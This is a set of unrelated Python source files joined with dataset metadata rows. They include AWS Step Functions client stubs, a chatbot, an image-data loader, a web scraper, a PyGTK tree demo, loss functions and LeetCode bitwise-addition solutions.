def list_tags_for_resource(self, resourceArn: str) -> Dict:
"""
List tags for a given resource.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/ListTagsForResource>`_
**Request Syntax**
::
response = client.list_tags_for_resource(
resourceArn='string'
)
**Response Syntax**
::
{
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **tags** *(list) --*
An array of tags associated with the resource.
- *(dict) --*
Tags are key-value pairs that can be associated with Step Functions state machines and activities.
- **key** *(string) --*
The key of a tag.
- **value** *(string) --*
The value of a tag.
:type resourceArn: string
:param resourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) for the Step Functions state machine or activity.
:rtype: dict
:returns:
"""
pass
def send_task_failure(self, taskToken: str, error: str = None, cause: str = None) -> Dict:
"""
Used by workers to report that the task identified by the ``taskToken`` failed.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/SendTaskFailure>`_
**Request Syntax**
::
response = client.send_task_failure(
taskToken='string',
error='string',
cause='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type taskToken: string
:param taskToken: **[REQUIRED]**
The token that represents this task. Task tokens are generated by the service when the tasks are assigned to a worker (see GetActivityTask::taskToken).
:type error: string
:param error:
The error code of the failure.
:type cause: string
:param cause:
A more detailed explanation of the cause of the failure.
:rtype: dict
:returns:
"""
pass
def send_task_heartbeat(self, taskToken: str) -> Dict:
"""
Used by workers to report to the service that the task represented by the specified ``taskToken`` is still making progress. This action resets the ``Heartbeat`` clock. The ``Heartbeat`` threshold is specified in the state machine's Amazon States Language definition. This action does not in itself create an event in the execution history. However, if the task times out, the execution history contains an ``ActivityTimedOut`` event.
.. note::
The ``Timeout`` of a task, defined in the state machine's Amazon States Language definition, is its maximum allowed duration, regardless of the number of SendTaskHeartbeat requests received.
.. note::
This operation is only useful for long-lived tasks to report the liveliness of the task.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/SendTaskHeartbeat>`_
**Request Syntax**
::
response = client.send_task_heartbeat(
taskToken='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type taskToken: string
:param taskToken: **[REQUIRED]**
The token that represents this task. Task tokens are generated by the service when the tasks are assigned to a worker (see GetActivityTaskOutput$taskToken ).
:rtype: dict
:returns:
"""
pass
def send_task_success(self, taskToken: str, output: str) -> Dict:
"""
Used by workers to report that the task identified by the ``taskToken`` completed successfully.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/SendTaskSuccess>`_
**Request Syntax**
::
response = client.send_task_success(
taskToken='string',
output='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type taskToken: string
:param taskToken: **[REQUIRED]**
The token that represents this task. Task tokens are generated by the service when the tasks are assigned to a worker (see GetActivityTaskOutput$taskToken ).
:type output: string
:param output: **[REQUIRED]**
The JSON output of the task.
:rtype: dict
:returns:
"""
pass
def start_execution(self, stateMachineArn: str, name: str = None, input: str = None) -> Dict:
"""
Starts a state machine execution.
.. note::
``StartExecution`` is idempotent. If ``StartExecution`` is called with the same name and input as a running execution, the call will succeed and return the same response as the original request. If the execution is closed or if the input is different, it will return a 400 ``ExecutionAlreadyExists`` error. Names can be reused after 90 days.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/StartExecution>`_
**Request Syntax**
::
response = client.start_execution(
stateMachineArn='string',
name='string',
input='string'
)
**Response Syntax**
::
{
'executionArn': 'string',
'startDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **executionArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the execution.
- **startDate** *(datetime) --*
The date the execution is started.
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine to execute.
:type name: string
:param name:
The name of the execution. This name must be unique for your AWS account, region, and state machine for 90 days. For more information, see `Limits Related to State Machine Executions <https://docs.aws.amazon.com/step-functions/latest/dg/limits.html#service-limits-state-machine-executions>`__ in the *AWS Step Functions Developer Guide* .
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``\" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
:type input: string
:param input:
The string that contains the JSON input data for the execution, for example:
``\"input\": \"{\\"first_name\\" : \\"test\\"}\"``
.. note::
If you don\'t include any JSON input data, you still must include the two braces, for example: ``\"input\": \"{}\"``
:rtype: dict
:returns:
"""
pass
def stop_execution(self, executionArn: str, error: str = None, cause: str = None) -> Dict:
"""
Stops an execution.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/StopExecution>`_
**Request Syntax**
::
response = client.stop_execution(
executionArn='string',
error='string',
cause='string'
)
**Response Syntax**
::
{
'stopDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **stopDate** *(datetime) --*
The date the execution is stopped.
:type executionArn: string
:param executionArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the execution to stop.
:type error: string
:param error:
The error code of the failure.
:type cause: string
:param cause:
A more detailed explanation of the cause of the failure.
:rtype: dict
:returns:
"""
pass
def tag_resource(self, resourceArn: str, tags: List) -> Dict:
"""
Add a tag to a Step Functions resource.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/TagResource>`_
**Request Syntax**
::
response = client.tag_resource(
resourceArn='string',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type resourceArn: string
:param resourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) for the Step Functions state machine or activity.
:type tags: list
:param tags: **[REQUIRED]**
The list of tags to add to a resource.
Tags may only contain unicode letters, digits, whitespace, or these symbols: ``_ . : / = + - @`` .
- *(dict) --*
Tags are key-value pairs that can be associated with Step Functions state machines and activities.
- **key** *(string) --*
The key of a tag.
- **value** *(string) --*
The value of a tag.
:rtype: dict
:returns:
"""
pass
def untag_resource(self, resourceArn: str, tagKeys: List) -> Dict:
"""
Remove a tag from a Step Functions resource
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/UntagResource>`_
**Request Syntax**
::
response = client.untag_resource(
resourceArn='string',
tagKeys=[
'string',
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type resourceArn: string
:param resourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) for the Step Functions state machine or activity.
:type tagKeys: list
:param tagKeys: **[REQUIRED]**
The list of tags to remove from the resource.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def update_state_machine(self, stateMachineArn: str, definition: str = None, roleArn: str = None) -> Dict:
"""
Updates an existing state machine by modifying its ``definition`` and/or ``roleArn`` . Running executions will continue to use the previous ``definition`` and ``roleArn`` . You must include at least one of ``definition`` or ``roleArn`` or you will receive a ``MissingRequiredParameter`` error.
.. note::
All ``StartExecution`` calls within a few seconds will use the updated ``definition`` and ``roleArn`` . Executions started immediately after calling ``UpdateStateMachine`` may use the previous state machine ``definition`` and ``roleArn`` .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/UpdateStateMachine>`_
**Request Syntax**
::
response = client.update_state_machine(
stateMachineArn='string',
definition='string',
roleArn='string'
)
**Response Syntax**
::
{
'updateDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **updateDate** *(datetime) --*
The date and time the state machine was updated.
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine.
:type definition: string
:param definition:
The Amazon States Language definition of the state machine. See `Amazon States Language <https://docs.aws.amazon.com/step-functions/latest/dg/concepts-amazon-states-language.html>`__ .
:type roleArn: string
:param roleArn:
The Amazon Resource Name (ARN) of the IAM role of the state machine.
:rtype: dict
:returns:
"""
pass
| true |
841213262645470c4f659bdb87a2cfcf36a00530 | Python | nerdyspook/Chatbot | /script.py | UTF-8 | 2,137 | 3.078125 | 3 | [] | no_license | from collections import Counter
from responses import responses, blank_spot
from user_functions import preprocess, compare_overlap, pos_tag, extract_nouns, compute_similarity
import spacy
word2vec = spacy.load('en')
exit_commands = ("quit", "goodbye", "exit", "no")
class ChatBot:
#define .make_exit() below:
def make_exit(self,user_message):
for command in exit_commands:
if command in user_message:
print("Goodbye!")
return True
#define .chat() below:
def chat(self):
user_message=input("Hello\n I am Cantina. What would You like to order?\n ")
while not self.make_exit(user_message):
user_message=self.respond(user_message)
#define .find_intent_match() below:
def find_intent_match(self, responses, user_message):
bow_user_message=Counter(preprocess(user_message))
processed_responses=[Counter(preprocess(response)) for response in responses]
similarity_list=[compare_overlap(response, bow_user_message) for response in processed_responses]
print(similarity_list)
response_index=similarity_list.index(max(similarity_list))
return responses[response_index]
#define .find_entities() below:
def find_entities(self, user_message):
tagged_user_message=pos_tag(preprocess(user_message))
message_nouns=extract_nouns(tagged_user_message)
tokens=word2vec(" ".join(message_nouns))
category=word2vec(" ".join(blank_spot))
word2vec_result=compute_similarity(tokens, category)
word2vec_result.sort(key=lambda x: x[2])
#if word2vec_result is None:
#return word2vec_result[-1][0]
#else:
#return blank_spot
return word2vec_result[-1][0]
#define .respond() below:
def respond(self, user_message):
best_response=self.find_intent_match(responses, user_message)
entity=self.find_entities(user_message)
print(best_response.format(entity))
input_message=input("Do you have another question?\n")
return input_message
#initialize ChatBot instance below:
chatbot=ChatBot()
#call .chat() method below:
chatbot.chat()
| true |
4e8ebfe4f031af43b15815c65ff4dc0bc59388aa | Python | gu-gridh/imsim | /imsim/src/data.py | UTF-8 | 1,608 | 3.171875 | 3 | [
"MIT"
] | permissive | import tensorflow as tf
from typing import *
class ImageDataset:
"""A simple wrapper around the tf.data.Dataset class.
"""
def __init__(self, dataset) -> None:
self.data = dataset
@classmethod
def from_pattern(cls, file_pattern: str):
return cls(tf.data.Dataset.list_files(file_pattern))
@classmethod
def from_files(cls, file_list: List[str]):
return cls(tf.data.Dataset.from_tensor_slices(file_list))
@staticmethod
def decode(path, new_height: int, new_width: int) -> Tuple[tf.Tensor, str]:
# load the raw data from the file as a string
img = tf.io.read_file(path)
# convert the compressed string to a 3D uint8 tensor
img = tf.io.decode_jpeg(img, channels=3)
# Resize to destination size
x = tf.image.resize_with_pad(img, new_height, new_width)
return x, path
def prepare(self, height: int, width: int, batch_size: int):
self.data = self.data.map(lambda x: ImageDataset.decode(x, height, width),
num_parallel_calls = tf.data.AUTOTUNE)\
.cache()\
.batch(batch_size)\
.prefetch(buffer_size=tf.data.AUTOTUNE)
return self
# Usage:
# height = 240
# width = 240
# batch_size = 128
# ds = ImageDataset.from_pattern("image_directory/*.jpg")
# ds = ds.map(lambda x: ImageDataset.decode(x, height, width), num_parallel_calls = tf.data.AUTOTUNE)\
# .cache()\
# .batch(batch_size)\
# .prefetch(buffer_size=tf.data.AUTOTUNE)\ | true |
edc99f50d2b22a19bb92e85c1881da6d27ba376f | Python | thanh-thuy/python | /main.py | UTF-8 | 313 | 2.96875 | 3 | [] | no_license | from datetime import datetime
def santaclaus():
today = datetime.today().strftime("%j")
ending_day_of_current_year = int(datetime.now().date().replace(month=12, day=25).strftime("%j"))
print("santa clause ", ending_day_of_current_year - int(today), "days left")
return
santaclaus()
| true |
9484cadaf8cf0263ae0b9d26490f4a9cf08e0656 | Python | oneTaken/leetcode | /easy/67.py | UTF-8 | 867 | 3.0625 | 3 | [
"Apache-2.0"
] | permissive | class Solution:
def addBinary(self, a, b):
"""
:type a: str
:type b: str
:rtype: str
"""
length = max(len(a), len(b))
# p = '{:0{}}'
a = '0' * (length - len(a)) + a
b = '0' * (length - len(b)) + b
tmp = '0'
ans = []
def char_plus(c1, c2):
if c1 == '1' and c2 == '1':
return '1', '0'
elif (c1 == '1' and c2 == '0') or (c1 == '0' and c2 == '1'):
return '0', '1'
else:
return '0', '0'
for i in range(length - 1, -1, -1):
_tmp1, _ans = char_plus(a[i], b[i])
_tmp2, _ans = char_plus(_ans, tmp)
_, tmp = char_plus(_tmp1, _tmp2)
ans.append(_ans)
if tmp == '1':
ans.append('1')
return ''.join(ans[::-1])
| true |
b2ef739a8db0b137aa6f204469d65e32d4ac0796 | Python | zheng568/DECAPS_for_COVID19 | /utils/loss_utils.py | UTF-8 | 1,895 | 2.765625 | 3 | [
"MIT"
] | permissive | import torch
import torch.nn as nn
import torch.nn.functional as F
class MarginLoss(nn.Module):
def __init__(self, args):
super(MarginLoss, self).__init__()
self.args = args
def forward(self, v_c, target):
labels = F.one_hot(target, self.args.num_classes)
present_error = F.relu(self.args.m_plus - v_c, inplace=True) ** 2 # max(0, m_plus-||v_c||)^2
absent_error = F.relu(v_c - self.args.m_minus, inplace=True) ** 2 # max(0, ||v_c||-m_minus)^2
l_c = labels.float() * present_error + self.args.lambda_val * (1. - labels.float()) * absent_error
loss = l_c.sum(dim=1).mean()
return loss
class SpreadLoss(nn.Module):
def __init__(self, args):
super(SpreadLoss, self).__init__()
self.num_class = args.num_classes
self.margin = args.m_min
def forward(self, ai, target):
b, E = ai.shape
assert E == self.num_class
at = ai[range(b), target]
at = at.view(b, 1).repeat(1, E)
zeros = ai.new_zeros(ai.shape)
loss = torch.max(self.margin - (at - ai), zeros)
loss = loss ** 2
loss = loss.sum() / b - self.margin ** 2
return loss
class CosineLoss(nn.Module):
def __init__(self, args):
super(CosineLoss, self).__init__()
self.args = args
self.cossim = nn.CosineSimilarity(dim=1, eps=1e-08)
def forward(self, f, t):
batch_size, num_head, dim = f.shape
loss = torch.mean(1 - self.cossim(f.view(-1, dim), t.view(-1, dim)))
return loss
class ReconstructionLoss(nn.Module):
def __init__(self):
super(ReconstructionLoss, self).__init__()
def forward(self, x, x_recont):
assert torch.numel(x) == torch.numel(x_recont)
x = x.view(x_recont.size()[0], -1)
reconst_loss = torch.mean((x_recont - x) ** 2)
return reconst_loss | true |
95f0f6eefb5e45743c17b94287cae79bc6032d14 | Python | jfrens/social-q-a-study | /scraper.py | UTF-8 | 2,624 | 2.90625 | 3 | [
"MIT"
] | permissive | from bs4 import BeautifulSoup
import urllib.request
import sys
if len(sys.argv) != 2:
print("Error: the username was not specified", file=sys.stderr)
sys.exit()
username = sys.argv[1]
print("Scraping data for user:" + username)
url = 'http://brainly.com/profile/' + username + '/solved'
# Build the request
# Brainly forbids requests without the User-Agent header
user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'
headers = {'User-Agent': user_agent}
# Send the request and get back a big blob of Unicode HTML
req = urllib.request.Request(url, None, headers)
with urllib.request.urlopen(req) as response:
the_page = response.read()
# Pass the html to the BeautifulSoup parser
soup = BeautifulSoup(the_page, "html.parser")
# Ensure we landed on a profile page
if not soup.head.title.string.startswith("Brainly.com - User's profile"):
print("Error: did not land on a profile page")
sys.exit()
# The list of questions has an ol tag, so here we search for all such elements
for ol in soup.body.find_all('ol'):
if ol['class'][0].startswith("tasks-list"):
soup_tasks = ol
# Build a list of question urls that the user has responded
question_list = []
for div in soup_tasks.find_all('div'):
if div['class'][0].startswith("task-content"):
soup_question = div.find('a')
question_list.append(soup_question['href'])
# Parse the info for each question
for question_urlpart in question_list:
question_url = 'http://brainly.com' + question_urlpart
# Send the request and get back a big blob of Unicode HTML
req = urllib.request.Request(question_url, None, headers)
with urllib.request.urlopen(req) as response:
the_page = response.read()
# Pass the html to the BeautifulSoup parser
soup = BeautifulSoup(the_page, "html.parser")
# Find the question
question_text = ''
for string in soup.body.find('h1', class_="sg-text").strings:
question_text += string
question_text = question_text.strip()
answer_text = ''
# Find the answer
for section in soup.body.find_all(id="answers"):
for answer in section.find_all(class_="brn-answer"):
answerer = answer.find('a')['title']
answer_element = answer.find(class_="sg-text")
if (username.startswith(answerer)):
for string in answer_element.strings:
answer_text += string
answer_text = answer_text.strip()
print("\n")
print("Question: " + question_urlpart)
print(question_text.encode("utf-8"))
print("Answer: ")
print(answer_text.encode("utf-8"))
| true |
f1d4d8e446b4dd74d3cbfa0949c8d43c3cc45afe | Python | brianchun16/PythonPractices | /Lecture02/Practice2.py | UTF-8 | 257 | 3.71875 | 4 | [] | no_license | first_name = "Brian"
last_name = "Chun"
full_name = first_name + " " + last_name
#print(full_name)
my_birth_year = 2001
current_year = 2017
my_age = current_year - my_birth_year
print("My name is " + full_name + " and I am " + str(my_age) + " years old") | true |
84c87f2a237170445456b28d0ce4339f5301eb77 | Python | Hacksign/algorithm | /QuickSort.py | UTF-8 | 799 | 3.4375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python2
#-*- coding:utf8 -*-
def quick_sort(A, low, high):
'''
快速排序算法实现
@A : array,未排序过的数组
@low : 开始排序的低位
@high : 结束排序的高位
@return : 无
@参考资料 : http://developer.51cto.com/art/201403/430986.htm
'''
if low >= high : return
key = A[low]
i = low + 1
j = high
while i < j :
while i < j and A[j] >= key : j -= 1
while i < j and A[i] <= key : i += 1
tmp = A[i]
A[i] = A[j]
A[j] = tmp
A[low] = A[i]
A[i] = key
quick_sort(A, low, i - 1)
quick_sort(A, i+ 1, high)
if __name__ == '__main__' :
unsorted_array = [2,9,1,7,7,5,6,3,4,0,8]
quick_sort(unsorted_array, 0, len(unsorted_array) - 1)
print unsorted_array
| true |
8f804ce9759fa79cf0ee9fe69bc9c3ac9464bfc9 | Python | hooyao/Coding-Py3 | /hackerrank/CrackInterview/LeftRotation.py | UTF-8 | 166 | 3.75 | 4 | [
"MIT"
] | permissive | def array_left_rotation(a, n, k):
t = k % n
return a[-(n - t):] + a[0:t]
answer = array_left_rotation([1, 2, 3, 4, 5], 5, 4)
print(*answer, sep=' ')
| true |
5e5f4b484100a2d6e1e1310a66fd4f86fe2dda11 | Python | FelixZFB/Python_data_analysis | /002_Python_data_analysis_from_entry_to_master/ch10_Numpy科学计算库/01_数组Array的属性_创建_重整_计算/007_数组计算_数组与数字.py | UTF-8 | 540 | 4.03125 | 4 | [] | no_license | # -*- coding:utf-8 -*-
# 数组计算,数组中每个值都会被计算
import numpy as np
# 生成一个一维数组
t1 = np.arange(12)
# 重写成二维数组
t2 = t1.reshape((3, 4))
# 上面可以简写为
# t2 = np.arange(12).reshape((3, 4))
print(t2)
# 乘法
t3 = t2 * 2
print()
print(t3)
# 除法,除以O,python中除以0会报错,
# 数组可以计算出结果,不会报错,会出现警告
t4 = t2 / 0
print()
print(t4)
# 输出结果:0/0=nan(not a number,不是一个数字) 2/0=inf(infinity 无限,无穷大) | true |
4c12b0b6348bb3256167968c91f839042d7919fa | Python | BasmatiBlanco/mat_leave_tracker | /Mat-leave-tracker.py | UTF-8 | 746 | 3.46875 | 3 | [] | no_license | import datetime
from datetime import timedelta
employee = input("What is employee name ")
vacation_rate = int(input("Employee Vacation Entitlement "))
vacation_ytd = int(input("Used vacation days this year "))
ml_ed = ""
ml_sd = 0
leave_length = int(input("12 or 18 month leave? "))
due_date_entry = input("What is due date (YYYY-MM-DD)")
year, month, day = map(int, due_date_entry.split("-"))
due_date = datetime.date(year, month, day)
days = (5 * vacation_rate) - vacation_ytd
ml_sd = due_date_entry + timedelta(-days)
if leave_length == 12:
days = 365
elif leave_length == 18:
days = 548
ml_ed = due_date_entry + timedelta(+days) + timedelta(vacation_rate * 5)
print("This leave starts " + ml_sd)
print("this leave ends " + ml_ed)
| true |
408ed8e69101cebe244cd53df6989d93780f8129 | Python | mahongquan/gimp-script | /pygtk/tree.py | UTF-8 | 5,225 | 3.59375 | 4 | [] | no_license | #!/usr/bin/env python
# example tree.c
import gtk
class TreeExample:
    """Python 2 / PyGTK demo: builds a GtkTree of five items, each with a
    five-item subtree, and logs every tree/item signal to stdout."""
    # for all the GtkItem:: and GtkTreeItem:: signals
    def cb_itemsignal(self, item, signame):
        """Log *signame* together with the clicked item's label text."""
        # It's a Bin, so it has one child, which we know to be a
        # label, so get that
        label = item.children()[0]
        # Get the text of the label
        name = label.get()
        # Get the level of the tree which the item is in
        print "%s called for item %s->%s" % (signame, name, item)
    # Note that this is never called
    def cb_unselect_child(self, root_tree, child, subtree):
        """Log unselect_child events (never fires in this demo)."""
        print ("unselect_child called for root tree %s, "
               "subtree %s, child %s" % (root_tree, subtree, child))
    # Note that this is called every time the user clicks on an item,
    # whether it is already selected or not.
    def cb_select_child(self, root_tree, child, subtree):
        """Log every click on a tree item."""
        print ("select_child called for root tree %s, subtree %s, "
               "child %s\n" % (root_tree, subtree, child))
    def cb_selection_changed(self, tree):
        """Print the labels of all currently selected items."""
        print "selection_change called for tree %s" % tree
        print "selected objects are:"
        for item in tree.get_selection():
            label = item.children()[0]
            name = label.get()
            print "\t%s" % name
    def __init__(self):
        """Build the window, the root tree and its items/subtrees."""
        itemnames = ["Foo", "Bar", "Baz", "Quux", "Maurice"]
        # a generic toplevel window
        window = gtk.GtkWindow(gtk.WINDOW_TOPLEVEL)
        window.connect("delete_event", gtk.mainquit)
        window.set_border_width(5)
        # A generic scrolled window
        scrolled_win = gtk.GtkScrolledWindow()
        scrolled_win.set_policy(gtk.POLICY_AUTOMATIC,
                                gtk.POLICY_AUTOMATIC)
        scrolled_win.set_usize(150, 200)
        window.add(scrolled_win)
        scrolled_win.show()
        # Create the root tree
        tree = gtk.GtkTree()
        print "root tree is %s" % tree
        # connect all GtkTree:: signals
        tree.connect("select_child", self.cb_select_child, tree)
        tree.connect("unselect_child", self.cb_unselect_child, tree)
        tree.connect("selection_changed", self.cb_selection_changed)
        # Add it to the scrolled window
        scrolled_win.add_with_viewport(tree)
        # Set the selection mode
        tree.set_selection_mode(gtk.SELECTION_MULTIPLE)
        # Show it
        tree.show()
        for i in range(5):
            # Create a tree item
            item = gtk.GtkTreeItem(itemnames[i])
            # Connect all GtkItem:: and GtkTreeItem:: signals
            item.connect("select", self.cb_itemsignal, "select")
            item.connect("deselect", self.cb_itemsignal, "deselect")
            item.connect("toggle", self.cb_itemsignal, "toggle")
            item.connect("expand", self.cb_itemsignal, "expand")
            item.connect("collapse", self.cb_itemsignal, "collapse")
            # Add it to the parent tree
            tree.append(item)
            # Show it - this can be done at any time
            item.show()
            # Create this item's subtree
            subtree = gtk.GtkTree()
            print "-> item %s->%s, subtree %s" % (itemnames[i], item, subtree)
            # This is still necessary if you want these signals to be called
            # for the subtree's children. Note that selection_change will be
            # signalled for the root tree regardless.
            subtree.connect("select_child", self.cb_select_child, subtree)
            subtree.connect("unselect_child", self.cb_unselect_child, subtree)
            # This has absolutely no effect, because it is completely ignored
            # in subtrees
            subtree.set_selection_mode(gtk.SELECTION_SINGLE)
            # Neither does this, but for a rather different reason - the
            # view_mode and view_line values of a tree are propagated to
            # subtrees when they are mapped. So, setting it later on would
            # actually have a (somewhat unpredictable) effect
            subtree.set_view_mode(gtk.TREE_VIEW_ITEM)
            # Set this item's subtree - note that you cannot do this until
            # AFTER the item has been added to its parent tree!
            item.set_subtree(subtree)
            for j in range(5):
                # Create a subtree item, in much the same way
                subitem = gtk.GtkTreeItem(itemnames[j])
                # Connect all GtkItem:: and GtkTreeItem:: signals
                subitem.connect("select", self.cb_itemsignal, "select")
                subitem.connect("deselect", self.cb_itemsignal, "deselect")
                subitem.connect("toggle", self.cb_itemsignal, "toggle")
                subitem.connect("expand", self.cb_itemsignal, "expand")
                subitem.connect("collapse", self.cb_itemsignal, "collapse")
                print "-> -> item %s->%s\n" % (itemnames[j], subitem)
                # Add it to its parent tree
                subtree.append(subitem)
                # Show it
                subitem.show()
        # Show the window and loop endlessly
        window.show()
def main():
    """Enter the GTK main loop (blocks until quit); returns 0."""
    gtk.mainloop()
    return 0
if __name__ == "__main__":
    # Build the window first, then hand control to the event loop.
    TreeExample()
    main()
| true |
ed9980675283a89bf1ad27954dd0bdd071e89964 | Python | rasuloff/practical-python-worked | /1.7 Functions/1.33_pcost_reading_rasuloff.py | UTF-8 | 665 | 3.59375 | 4 | [] | no_license | # pcost.py
#
# Exercise 1.33: Reading from the command line
import csv
import sys
def portfolio_cost(filename):
    """Return the total cost (shares * price) of the portfolio in *filename*.

    The file is a CSV with a header row and columns (name, shares, price).
    Malformed rows are reported with a warning and skipped.
    """
    total_cost = 0.0
    with open(filename, 'rt') as f:
        rows = csv.reader(f)  # use the csv module (was imported but unused)
        next(rows)            # skip the header row
        for row in rows:
            try:
                number_shares = int(row[1])
                price = float(row[2])
                total_cost += number_shares * price
            except (ValueError, IndexError):
                # IndexError added: rows with missing columns now warn too.
                print('Warning - Error in row:', row)
    return total_cost
# Allow the portfolio file to be supplied on the command line.
if len(sys.argv) == 2:
    filename = sys.argv[1]  # fix: was `sys.srgv[1]` (AttributeError)
else:
    filename = 'Data/portfolio.csv'
cost = portfolio_cost(filename)
print('Total Cost:', cost)
| true |
cf0079a632fe9236ef6b867f4ab6f8d3103435b3 | Python | cherryzoe/Leetcode | /371. Sum of Two Integers.py | UTF-8 | 3,963 | 3.875 | 4 | [] | no_license | # Calculate the sum of two integers a and b, but you are not allowed to use the operator + and -.
# Example:
# Given a = 1 and b = 2, return 3.
# Python 表示一个数不止32位.
# https://www.hrwhisper.me/leetcode-sum-two-integers/
# http://bookshadow.com/weblog/2016/06/30/leetcode-sum-of-two-integers/
# 因此。。做这题要保证两个数在正确的范围内(本题是int,32bit)
# 如何做到呢?我们知道32bit 可以表示的无符号整数位0~0xFFFFFFFF(全0~全1)
# 因此,我们使用&来保证该数是32bit.
# int的0和正整数范围为0~0x7FFFFFFF,int负数的范围为-0x80000000~-1,因此,大于0x7FFFFFFF的其实是最高位为1(这是符号位)。这样算出来是把最高位不当成符号位,我们还需要对负数的情况进行修正。
# 在具体实现上,我们可以先 &0x7FFFFFFF 然后取反,这样,-1变为-0x80000000(-2147483648) -2变为了-0x7FFFFFFF(-2147483647) ,因此,在^0x7FFFFFFF即可。。
# recursive solution:
# 此题不能用+号,故可以将需要用到加号的部分想象成函数。 a+b可以想象成 F(a,b) a+b可以转化成求 (subsum + carry) --> F(subsum, carry),实质上都是一样,可以用递归解决
class Solution(object):
    """Recursive bitwise addition: XOR is the partial sum, AND<<1 the carry."""
    def getSum(self, a, b):
        """
        :type a: int
        :type b: int
        :rtype: int

        Masking with 0xFFFFFFFF keeps values in unsigned 32-bit range;
        results above 0x7FFFFFFF are converted back to negative ints.
        """
        MASK = 0xFFFFFFFF
        max_int = 0x7FFFFFFF
        if b == 0:
            # fix: `a <= max_int` — 0x7FFFFFFF itself is a valid positive
            # result; the original `a < max_int` mangled it into a negative.
            return a if a <= max_int else ~(a ^ MASK)
        _sum = (a ^ b) & MASK
        carry = ((a & b) << 1) & MASK
        return self.getSum(_sum, carry)
# Iterative solution:
class Solution(object):
    # NOTE(review): this class defines getSum twice; the second definition
    # shadows the first, so only the second version is ever callable.
    def getSum(self, a, b):
        """
        :type a: int
        :type b: int
        :rtype: int
        """
        MASK = 0xFFFFFFFF
        max_int = 0x7FFFFFFF
        min_int = 0x80000000
        while b:
            a, b = (a^b) & MASK, ((a&b)<<1) & MASK
        # NOTE(review): `a < max_int` looks off-by-one (0x7FFFFFFF is a valid
        # positive result) — harmless here since this def is shadowed below.
        return a if a < max_int else ~(a ^ MASK)
    def getSum(self, a, b):
        """
        :type a: int
        :type b: int
        :rtype: int
        """
        MAX_INT = 0x7FFFFFFF
        MASK = 0x100000000
        if a == 0:
            return b
        if b == 0:
            return a
        while b != 0:
            _sum = (a ^ b) % MASK #calculate sum of a and b without thinking the carry
            b = ((a & b)<<1) % MASK #calculate the carry
            a = _sum # add sum(without carry) and carry
        return a if a <= MAX_INT else ~((a & MAX_INT) ^ MAX_INT) #restore the sign: set all bits above bit 31 back to 1
# 7/9/2018 Update:
class Solution(object):
    """Iterative bitwise addition with a 32-bit mask."""
    def getSum(self, a, b):
        """
        :type a: int
        :type b: int
        :rtype: int
        """
        # If either operand is zero the other one is the answer.
        if not a or not b:
            return a or b
        mask = 0xffffffff
        total, carry = a, b
        # XOR gives the carry-less sum, AND<<1 the carry; repeat until
        # the carry dies out. Masking keeps the value 32-bit unsigned.
        while carry:
            total, carry = (total ^ carry) & mask, ((total & carry) << 1) & mask
        # Bit 31 set means the 32-bit result is negative: flip back to
        # a signed Python int.
        if (total >> 31) & 1:
            return ~(total ^ mask)
        return total
class Solution(object):
    """Bitwise addition via repeated (XOR, carry) steps.

    Every intermediate value is masked to 32 bits, so the loop works on
    the two's-complement representation; a final check of bit 31
    converts the unsigned result back into a signed Python int.
    """
    def getSum(self, a, b):
        """
        :type a: int
        :type b: int
        :rtype: int
        """
        if a == 0:
            return b
        elif b == 0:
            return a
        mask = 0xffffffff  # keep working values in unsigned 32-bit range
        partial, carry = a, b
        while carry != 0:
            partial, carry = (partial ^ carry) & mask, ((partial & carry) << 1) & mask
        # Negative iff the sign bit (bit 31) is set: undo the mask.
        if (partial >> 31) & 1:
            return ~(partial ^ mask)
        return partial
| true |
68de7bc3706bc438fb16483391daa368d5c40886 | Python | aubreystevens/image_processing_pipeline | /text_files/.ipynb_checkpoints/untitled-3-checkpoint.py | UTF-8 | 255 | 3.203125 | 3 | [] | no_license | def set_row(values):
'''
Change the contents of the indicated row on the indicated face.
The internal representation of the cube is not altered.
'''
vals = copy.deepcopy(values)
print(vals)
set_row([1, 2, 3])
| true |
9e547851eccb6893199915773ba24fccae128582 | Python | KodeWorker/transformer_demo | /Speech2Text/AudioDemo/main.py | UTF-8 | 3,007 | 2.578125 | 3 | [] | no_license | import pyaudio
import wave
import numpy as np
from queue import Queue
import copy
from eval import translate
import threading
class TranslatingThread(threading.Thread):
    """Background worker: transcribe one audio clip and print the text."""

    def __init__(self, data, rate, model_name):
        """Keep the samples, their sample rate and the model identifier."""
        super().__init__()
        self.data = data
